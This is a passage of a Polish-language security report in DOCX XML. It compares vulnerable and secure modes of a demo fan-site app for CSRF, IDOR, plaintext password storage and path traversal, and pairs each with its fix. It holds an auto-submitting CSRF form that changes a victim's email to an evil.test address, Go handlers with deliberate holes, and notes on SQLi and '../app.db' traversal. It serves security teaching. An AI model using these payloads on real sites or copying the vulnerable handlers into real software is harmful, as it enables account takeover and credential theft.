              <w:t>form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method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"POST"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action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"http://localhost:8080/ui/profile"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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>input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name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"new_email"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value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"attacker+csrf@evil.test"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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>form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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>script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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>document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forms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0E7490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submit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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>script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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2028" w:name="lst28"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 28. Fragment implementacji aplikacji (html). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2028"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Przeglądarka ofiary wysyła cookie sesyjne razem z żądaniem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W trybie vulnerable endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nie sprawdza tokena CSRF i aktualizuje email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing C.1 - kod niezabezpieczony: brak walidacji CSRF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vulnerable path: no CSRF token check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newEmail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PostForm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"new_email"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svc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UpdateUserEmail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newEmail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;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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// error handling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29" w:name="lst29"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 29. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2029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6559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srf-vulnerab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55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24" w:name="fig24"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 24. CSRF vulnerable. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1024"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ten sam krok w trybie secure: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Ofiara nadal korzysta z tej samej funkcji </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile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>Atakujący wysyła identyczny sfałszowany POST bez tokena.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Handler w trybie secure wymaga zgodności tokena z formularza i cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing C.2 - kod zabezpieczony: porównanie tokena z formularza i cookie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formToken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PostForm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"csrf_token"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cookieToken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cookieErr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Cookie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csrfCookieName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cookieErr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||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formToken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==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||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formToken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cookieToken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111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>renderHTML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StatusForbidden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"csrf_secure"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component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30" w:name="lst30"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 30. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2030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6559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srf-secu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55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25" w:name="fig25"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 25. CSRF secure. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1025"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ocena rezultatu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pozostaje jedną funkcją aplikacji. Różnica między trybami polega na weryfikacji intencji użytkownika tokenem CSRF, a nie na przeniesieniu operacji do innego endpointu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="25" w:name="sec25"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.5. D. IDOR/Broken Access Control w kolejce moderacyjnej</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja strony:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> moderator lub użytkownik widzi kolejkę wpisów i może usuwać posty. Funkcja używa endpointu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /ui/posts/delete/:id</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Poprawne użycie:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> autor usuwa własny wpis, a administrator usuwa wpis dowolnego użytkownika w ramach moderacji.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Atak w trybie vulnerable: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Użytkownik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> loguje się na konto zwykłego członka.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>W kolejce moderacyjnej lub przez zmodyfikowane żądanie próbuje usunąć post admina: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k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_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_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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2031" w:name="lst31"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 31. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2031"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>W trybie vulnerable aplikacja sprawdza tylko, czy użytkownik jest zalogowany. Nie sprawdza właściciela zasobu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing D.1 - kod niezabezpieczony: usunięcie po samym zalogowaniu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requireLoginUI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"/ui/login?err=1&amp;msg=Please+log+in+to+delete+posts"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svc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DeletePost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id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32" w:name="lst32"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 32. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2032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307495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dor-vulnerabl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0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26" w:name="fig26"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 26. IDOR vulnerable. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1026"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ten sam krok w trybie secure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wysyła ten sam POST na ten sam endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Handler odczytuje autora posta i rolę użytkownika.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Jeśli użytkownik nie jest autorem ani adminem, operacja zostaje zablokowana.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing D.2 - kod zabezpieczony: kontrola właściciela albo roli admina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111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>allowed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authErr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canDeletePost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id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authErr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||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allowed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    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Redirect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StatusSeeOther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"/ui/posts?err=1&amp;msg=You+can+delete+only+your+own+posts"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   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33" w:name="lst33"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 33. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2033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310774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dor-secur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7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27" w:name="fig27"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 27. IDOR secure. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1027"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ocena rezultatu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> poprawka znajduje się po stronie serwera. Samo ukrycie przycisku w UI nie wystarcza, ponieważ atakujący może wysłać POST ręcznie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="26" w:name="sec26"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.6. E. Sensitive Data Exposure w katalogu członków</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja strony:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wewnętrzny widok </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Members</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pokazuje konta, role i adresy email. To panel utrzymaniowy aplikacji.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Poprawne użycie:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> administrator albo maintainer przegląda listę członków, sprawdza role i adresy email. W takim scenariuszu widok nie powinien ujawniać sekretów logowania.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Problem w trybie vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Aplikacja seeduje i przechowuje hasła jako tekst jawny.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Widok członków pokazuje, że kolumna </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> w rzeczywistości zawiera hasła.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ten sam problem byłby widoczny także przy wycieku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>app.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> przez SQLi albo Path Traversal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing E.1 - kod niezabezpieczony: hasło zapisane jako tekst jawny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preparePassword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plain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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// VULNERABLE: plaintext storage (Sensitive Data Exposure)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plain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hash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bcrypt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GenerateFromPassword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7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>byte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plain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bcrypt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DefaultCost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hash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34" w:name="lst34"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 34. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2034"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Warianty rozszerzone:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Credential replay:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> po odczytaniu tabeli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> atakujący próbuje użyć jawnych wartości z kolumny </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jako haseł w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/login</w:t>
      </w:r>
      <w:r>
        <w:t>. W trybie vulnerable jest to szczególnie groźne, bo przechowywany sekret jest dokładnie tym, czego wymaga formularz logowania.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Łańcuch SQLi + dane wrażliwe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload SQL Injection z biblioteki może wyświetlić </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jako wynik wyszukiwarki. Oznacza to, że błąd w polu wyszukiwania prowadzi bezpośrednio do ujawnienia danych uwierzytelniających.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Łańcuch LFI + baza SQLite:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Path Traversal na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../app.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> próbuje pobrać bazę. Jeżeli baza zawiera tekst jawny, sam odczyt pliku staje się wyciekiem haseł.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30130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embers-vulnerab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013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28" w:name="fig28"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 28. Sensitive data vulnerable. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1028"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tryb secure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Hasła są hashowane bcryptem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Wyciek bazy nie ujawnia bezpośrednio haseł.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Użytkownik nadal może się logować, ale aplikacja porównuje hasło przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bcrypt.CompareHashAndPassword</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing E.2 - kod zabezpieczony: bcrypt przed zapisem sekretu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encodePasswordForSeed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password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password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hash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bcrypt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GenerateFromPassword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7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>byte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password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bcrypt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DefaultCost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hash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35" w:name="lst35"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 35. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2035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301301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embers-secur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013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29" w:name="fig29"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 29. Sensitive data secure. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1029"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ocena rezultatu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Members</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pokazuje konsekwencję decyzji z warstwy zapisu danych. Tryb secure nie ukrywa istnienia kont, ale usuwa najgroźniejszy skutek wycieku: możliwość natychmiastowego użycia hasła.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="27" w:name="sec27"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.7. F. Path Traversal w Fanart vault</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja strony:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fanart vault</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> służy do podglądu załączników wrzucanych do fan postów. Parametr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reprezentuje nazwę pliku w katalogu uploadów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Poprawne użycie:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użytkownik wybiera plik z listy załączników, np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>miku-setlist.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a aplikacja pokazuje jego zawartość z katalogu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploads/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Atak w trybie vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Użytkownik otwiera vault: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?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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2036" w:name="lst36"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 36. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2036"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Handler skleja ścieżkę.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing F.1 - kod niezabezpieczony: sklejenie katalogu z parametrem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path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uploadsDir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"/"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filename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data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os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ReadFile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path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37" w:name="lst37"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 37. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2037"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sekwencja </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wychodzi poza katalog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
